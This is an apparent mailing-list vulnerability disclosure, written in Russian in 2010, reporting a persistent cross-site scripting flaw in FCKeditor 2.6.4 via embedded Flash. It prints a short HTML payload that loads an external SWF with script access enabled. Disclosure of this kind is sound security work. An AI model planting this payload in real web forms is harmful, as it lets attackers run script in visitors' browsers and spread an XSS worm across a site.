Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

XSS Vulnerability in Drupal's Node Blocks contributed module (6.x-1.3  and 5.x-1.1)

SEC Consult SA-20100115-0 :: Local file inclusion/execution and multiple CSRF vulnerabilities in LetoDMS (formerly MyDMS)

Cross Site Identification (CSID) attack. Description and  demonstration.

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	17.01.2010
Subject:	New vulnerability in FCKeditor

Здравствуйте 3APA3A!

Сообщаю вам о Cross-Site Scripting уязвимости в FCKeditor.

XSS:

Это persistent XSS через Flash.

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name=movie
value="http://site/xss.swf"><param name="allowscriptaccess" value="always"><embed
src="http://site/xss.swf" allowscriptaccess="always"></embed></object>

Данная уязвимость в самом редакторе, поэтому её можно использовать на любом сайте,
использующего FCKeditor в качестве редактора для веб форм. Данная уязвимость может привести
к заражению всего сайта XSS-червём.

Уязвимы FCKeditor 2.6.4 и предыдущие (и последующие) версии.

О данной уязвимости я упомянул у себя на сайте (http://websecurity.com.ua/3683/).

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua